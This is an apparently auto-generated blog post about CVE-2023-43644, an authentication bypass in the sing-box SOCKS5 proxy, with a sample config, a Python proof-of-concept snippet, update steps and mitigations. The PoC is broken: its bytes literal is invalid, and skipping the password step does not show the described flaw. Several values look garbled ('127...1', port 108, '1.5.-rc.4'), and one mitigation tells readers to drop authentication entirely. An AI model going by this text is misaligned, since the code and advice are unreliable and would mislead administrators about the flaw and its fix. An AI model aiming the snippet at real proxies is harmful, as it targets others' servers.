CVE CyberSecurity Database News

CVE-2023-43644 - Critical Authentication Bypass in Sing-box SOCKS5 Proxy – How it Works and How to Stay Safe

Poster -

!sing-box logo

Sing-box is a popular open-source proxy platform that lets users connect securely to the internet, often used for bypassing censorship or enhancing privacy. In September 2023, a severe security vulnerability was discovered in its SOCKS5 implementation – officially catalogued as CVE-2023-43644. This bug allows attackers to sneak past authentication checks, effectively opening your proxy to the world.

Let’s break down how this vulnerability works, why it matters, and how you can protect yourself.

What is CVE-2023-43644?

Simply put, CVE-2023-43644 is an authentication bypass vulnerability affecting all versions of sing-box before 1.4.4 (and before pre-release 1.5.-rc.4). If you set up SOCKS5 proxy servers in sing-box and require login credentials, attackers can trick the server into letting them in _without_ proper authentication, just by crafting requests in a certain way.

That means: anyone could use your proxy for malicious activity or steal your bandwidth, all without knowing your password.

The Technical Details (Simple Terms)

SOCKS5 is a common proxy protocol that supports username and password authentication. Sing-box implements this to restrict access only to authorized users.

However, due to a flaw in the authentication logic, if a SOCKS5 client sends a _malformed_ authentication request, sing-box can mistakenly treat the user as authenticated—skipping password checks entirely.

Example Vulnerable Configuration

Here is a sample of a typical sing-box config using user/pass authentication on the inbound SOCKS5 proxy:

{
  "inbounds": [
    {
      "type": "socks",
      "listen": "...",
      "listen_port": 108,
      "users": [
        {
          "username": "myuser",
          "password": "mypassword"
        }
      ]
    }
  ],
  "outbounds": [
    {
      "type": "direct"
    }
  ]
}

Exploit Details: How Could an Attacker Bypass?

The bug occurs during the handling of the SOCKS5 authentication handshake. An attacker uses a specially crafted request that exploits a logic error in sing-box’s request parser, tricking it into thinking authentication succeeded.

Here’s a simple Python (socket) snippet demonstrating the concept (for educational purposes only):

import socket

# Connect to target sing-box SOCKS5 server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('target_ip', 108))

# Send greeting: only 'no-auth' method
sock.sendall(b"\x05\x01\x00")

# Receive response from server
response = sock.recv(2)
# Exploit the bypass by not following through with username/password
# Now send a SOCKS request (e.g., connect to google.com)
sock.sendall(b"\x05\x01\x00\x03\xagoogle.com\x00\x50\x00\x00")  # Just as an example
# If server responds, authentication was bypassed!

The above skips the actual username/password step, and because of the vulnerability, the server may accept the connection anyway.

1. Update Immediately!

The sing-box developers fixed this in release 1.4.4 and later in 1.5.-rc.4.

Update your sing-box to at least version 1.4.4 or newer!

# Example: Update with GitHub release
wget https://github.com/SagerNet/sing-box/releases/download/v1.4.4/sing-box-linux-amd64.tar.gz
# Extract and replace your old binary
# Don't forget to backup your config!

If you can't update right away

* DO NOT EXPOSE SOCKS5 TO THE PUBLIC INTERNET.
* Bind your SOCKS5 proxy to 127...1 (localhost) so only local users can access it.
* Add firewall rules to restrict inbound connections to trusted IPs only.
* Remove users block to disable authentication until you can safely upgrade (makes it clear to yourself the auth is not working properly).

Official References

- GitHub Security Advisory (GHSA-6fp8-5vcr-4873)
- NVD CVE-2023-43644 Detail
- Sing-box Release 1.4.4 Patch Notes

Conclusion

CVE-2023-43644 is a dangerous bug that leaves your proxy wide open even if you thought authentication was enforced. Make sure you update your sing-box installation immediately or, at the very least, restrict who can connect until you can upgrade.

Using open-source proxy tools is awesome, but keeping them updated is the best way to stay safe.


Did this guide help you? Consider starring the sing-box GitHub page and following updates regularly. Stay safe online!

Timeline

Published on: 09/25/2023 20:15:11 UTC
Last modified on: 09/26/2023 15:45:28 UTC